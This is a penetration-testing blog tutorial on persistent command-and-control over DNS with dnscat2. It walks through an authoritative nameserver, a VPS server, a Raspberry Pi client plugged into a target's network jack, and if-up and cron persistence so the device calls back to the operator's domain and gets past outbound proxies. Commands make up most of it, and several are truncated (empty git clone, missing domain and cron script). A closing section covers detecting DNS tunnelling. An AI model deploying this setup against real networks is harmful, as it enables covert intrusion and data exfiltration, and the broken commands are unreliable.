Persistent C2 with dnscat2

Occasionally an environment has strict outbound rules with all traffic going through an authenticated proxy. This hampers exfiltration, especially if you don’t currently have valid credentials but need a foothold into an environment without phishing for instance. If we can find a live network jack in some accessible place and the switch hands out an IP address via DHCP along with DNS servers, we can more than likely obtain a foothold into the network.

Thanks to some awesome work by iagox86, these directions can be used to configure dnscat2 to automatically connect back to your server over DNS in an automated fashion, similar to a PwnPlug.



Authoritative DNS

Configure an authoritative name server on the DNS provider account. Using namecheap for instance:

Manage Domain > Advanced DNS > Add Personal DNS Servers > ns1 == and ns2 ==

Then, under Domain > Use Custom DNS > use ns1.examplecom and

Check this is working by running on the server: sudo nc -vv -l -u -p53 and from another machine nslookup to verify traffic is hitting this IP.

Set up dnscat2 server side

Log in to your VPS, get dnscat2, and install it.

# apt-get update
# apt-get -y install ruby-dev git make g++
# gem install bundler
# git clone
# cd dnscat2/server
# bundle install

And start the server.

# ruby /home/admin/dnscat2/server/dnscat2.rb --secret=verysecret

Configure the client/Raspberry Pi

Compile the dnscat2 client

On the Raspberry Pi or client

$ git clone
$ cd dnscat2/client/
$ make

At this point you can run dnscat2 with the following to confirm things are working. We’ll be coming back to this so no need to keep in running.

$ sudo /home/rpi/dnscat2/client/dnscat --secret=verysecret --dns,type=TXT

Configure Persistance

We want our little remote computer to always be connected to us. Every time it’s plugged in, dnscat2 should be calling back to our infrastructure. In addition, DNS can be flaky so we always want to ensure there’s always a callback.

Make eth0 ask for a DHCP address everytime it’s plugged in

$cat /etc/networking/interfaces
  auto eth0
  allow-hotplug eth0
  iface eth0 inet dhcp

Add an interface up start script

$cat /home/rpi/start_dnscat2
  echo "[+] Starting dnscat2..."
  tmux new -s dnscat -d /home/rpi/dnscat2/client/dnscat
$ln -s  /home/rpi/start_dnscat2 /etc/network/if-up.d/start_dnscat2
$chmod +x /home/rpi/start_dnscat2

Configure cron to check every five minutes if dnscat2 is running and start it if not.


if ! $(ps aux | grep -i "[t]mux" > /dev/null); then
	echo "[!] Starting dnscat2..."
	echo "[+] dnscat2 is running..."

$crontab -e
*/5 * * * * /home/rpi/

That’s it. Now whenever an interface comes up, dnscat2 will make a connection to the configured domain and check every 5 minutes if there is a connection, starting one if not.

dnscat2 reference

dnscat2 isn’t super intuitive so some operational notes for quick reference:

Identifying dnscat2 on the wire

There are number of ways to identify malicious DNS traffic and this SANS paper details quite a few methods of identification. In addition, in this case we’re specifying TXT records which aren’t too common. [One paper] ( (Table 1) puts TXT record usage around 7% of a given large sample size. Another puts that usage at closer to less than 1%.

It’s difficult to directly prevent DNS tunnelling but with a bit of traffic and payload analysis an attacker who’s not careful is likely to be identified.


Most of this info is from iagox86’s github and Lenny Zeltser’s write up on dnscat2.